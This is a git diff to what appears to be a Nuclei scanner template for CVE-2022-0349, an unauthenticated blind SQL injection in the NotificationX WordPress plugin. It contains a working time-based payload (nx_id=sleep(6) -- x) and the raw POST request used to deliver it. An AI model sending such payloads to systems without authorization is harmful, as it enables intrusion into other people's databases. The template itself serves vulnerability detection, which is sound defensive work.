diff --git a/cves/2022/CVE-2022-0349.yaml b/cves/2022/CVE-2022-0349.yaml index 462bd2f525..c3c61e076c 100644 --- a/cves/2022/CVE-2022-0349.yaml +++ b/cves/2022/CVE-2022-0349.yaml @@ -8,11 +8,13 @@ info: The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection. reference: - https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a + - https://wordpress.org/plugins/notificationx/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0349 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0349 classification: cve-id: CVE-2022-0349 - tags: cve,notificationx,wordpress,wordpressplugin,sqli,cve2022 + metadata: + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx requests: - raw: @@ -21,14 +23,12 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - nx_id%3Dsleep(5)%20--%20x + nx_id=sleep(6) -- x - matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=5' - - - type: status - status: - - 200 + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "\"data\":{\"success\":true}")' + condition: and